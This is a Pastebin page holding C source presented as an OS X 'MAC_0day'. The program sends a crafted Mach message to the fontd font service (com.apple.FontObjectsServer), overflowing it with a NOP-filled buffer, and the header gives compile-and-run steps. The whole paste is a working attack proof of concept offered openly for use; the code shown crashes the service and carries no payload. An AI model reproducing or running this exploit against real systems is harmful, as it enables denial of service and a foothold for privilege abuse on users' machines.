API tools faq
paste
SH1NU11b1

MAC_0day

SH1NU11b1
Dec 4th, 2015
143
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.21 KB | None | 0 0
raw download clone embed print report diff
  1. /*
  2. OS X 0day - works on latest version as of 4/30/15
  3. BO exploitation @ fontd, allows payload to run code with fontd privileges.
  4. gcc getrekt.c -o getrekt; chmod 777 *; ./getrekt
  5. */
  6.  
  7. #include <stdio.h>
  8. #include <stdlib.h>
  9. #include <mach/mach.h>
  10. #include <servers/bootstrap.h>
  11.  
  12. #define SERVICE_NAME "com.apple.FontObjectsServer"
  13. #define DEFAULT_MSG_ID 46
  14.  
  15. #define EXIT_ON_MACH_ERROR(msg, retval, success_retval) if (kr != success_retval) { mach_error(msg ":" , kr); exit((retval)); }
  16.  
  17. typedef struct {
  18. mach_msg_header_t header;
  19. mach_msg_size_t descriptor_count;
  20. mach_msg_ool_descriptor64_t desc;
  21. } msg_format_send_t;
  22. typedef struct {
  23. u_int32_t int1;
  24. u_int32_t int2;
  25. u_int32_t size_data;
  26. char data[512];
  27. } hi_msg;
  28.  
  29. int main(int argc, char **argv) {
  30. kern_return_t kr;
  31. msg_format_send_t send_msg;
  32. mach_msg_header_t *send_hdr;
  33. mach_port_t server_port;
  34. vm_address_t hi_addr = 0;
  35. hi_msg *hello;
  36.  
  37. kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &server_port);
  38. EXIT_ON_MACH_ERROR("bootstrap_look_up", kr, BOOTSTRAP_SUCCESS);
  39.  
  40.         vm_allocate(mach_task_self(), &hi_addr, sizeof(hi_msg), VM_FLAGS_ANYWHERE);
  41. hello = (hi_msg *)hi_addr;
  42.  
  43. send_hdr = &(send_msg.header);
  44. send_hdr->msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MOVE_SEND,0) | MACH_MSGH_BITS_COMPLEX;
  45. send_hdr->msgh_size = sizeof(send_msg);
  46. send_hdr->msgh_remote_port = server_port;
  47. send_hdr->msgh_local_port = MACH_PORT_NULL;
  48. send_hdr->msgh_id = DEFAULT_MSG_ID;
  49. send_msg.descriptor_count = 1;
  50. send_msg.desc.address = (uint64_t)hello;
  51. send_msg.desc.size = sizeof(hi_msg);
  52. send_msg.desc.type = MACH_MSG_OOL_DESCRIPTOR;
  53. printf("Sending... fontd will crash now.\n");
  54. hello->int1 = __builtin_bswap32(0x16);
  55. hello->int2 = __builtin_bswap32(0x01);
  56. hello->size_data = __builtin_bswap32(sizeof(hello->data));
  57. memset(hello->data, 0x90, sizeof(hello->data));
  58.  
  59. // send request
  60. kr = mach_msg(send_hdr, // message buffer
  61.         MACH_SEND_MSG, // option indicating send
  62.         send_hdr->msgh_size, // size of header + body
  63.         0, // receive limit
  64.         MACH_PORT_NULL, // receive name
  65.         MACH_MSG_TIMEOUT_NONE, // no timeout, wait forever
  66.         MACH_PORT_NULL); // no notification port
  67. EXIT_ON_MACH_ERROR("mach_msg(send)", kr, MACH_MSG_SUCCESS);
  68.  
  69. printf("Exiting\n");
  70. exit(0);
  71. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!